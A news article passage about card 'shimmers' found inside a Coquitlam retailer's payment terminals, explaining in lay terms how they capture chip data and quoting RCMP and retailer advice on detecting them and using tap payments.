Unlike skimmers, a shimmer — named for its slim profile — fits inside a card reader and can be installed quickly and unobtrusively by a criminal who slides it into the machine while pretending to make a purchase or withdrawal. 

Once installed, the microchips on the shimmer record information from chip cards, including the PIN.

That information is later extracted when the criminal inserts a special card — also during a purchase or cash withdrawal — which downloads the data. The information is then used to make fake cards.

Fraud clue: sticky card

Shimmers have rendered the bigger and bulkier skimmers virtually obsolete, according to Const. Alex Bojic of the Coquitlam RCMP economic crime unit.

“You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement.

“Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”

McLaughlin said the Coquitlam retailer detected the shimmers through its newly introduced daily testing of point-of-sales terminals. A test card inserted into the machines kept on getting stuck and the shimmers were found when the terminals were opened. 

“We want to get the word out,” said McLaughlin. “Businesses really need to be checking for these kinds of devices and consumers need to be aware of them.”

Bojic said using the tap function of a chip card is one way to avoid being “shimmed.” 

“It’s actually very secure. Each tap transfers very limited banking information, which can’t be used to clone your card,” Bojic said.